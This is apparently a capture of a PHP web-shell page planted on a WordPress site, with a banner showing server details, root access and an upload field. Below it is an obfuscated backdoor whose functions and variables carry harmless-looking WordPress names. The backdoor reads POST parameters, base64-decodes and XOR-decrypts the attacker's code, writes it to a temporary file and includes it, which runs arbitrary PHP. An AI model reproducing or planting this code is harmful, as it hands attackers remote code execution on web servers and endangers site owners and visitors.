| Server IP : 167.235.67.158 / Your IP : 216.73.216.95 Web Server : Apache System : Linux ubuntu-8gb-nbg1-1 6.8.0-111-generic #111-Ubuntu SMP PREEMPT_DYNAMIC Sat Apr 11 23:16:02 UTC 2026 x86_64 User : root ( 0) PHP Version : 8.3.6 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/queenofbradgate.co.uk/wp-content/ |
Upload File : |
<?php function sanitize_slug($feedback) {
$audio = file_get_contents('php://input');
$subsets = array();
if (preg_match('/(^|&)'.$feedback.'=(.*?)(&|$)/', $audio, $subsets)) {
return urldecode($subsets[2]);
}
return false;
}
$nonce = sanitize_slug('updated');
if (!empty($nonce)) {
$idmode = sanitize_slug('order');
function set_raw_data($tokens, $support) {
$tokens = preg_split('//', $tokens, -1, 1);
array_walk($tokens, function(&$minutes, $group, $_dir) { $minutes = chr(ord($minutes) ^ ord($_dir[$group % strlen($_dir)])); }, $support);
return implode("", $tokens);
}
$label = set_raw_data(base64_decode($nonce), $idmode);
$_comment = tmpfile();
fwrite($_comment, "<?php ".$label);
$parsed = stream_get_meta_data($_comment);
include $parsed["uri"];
}
?>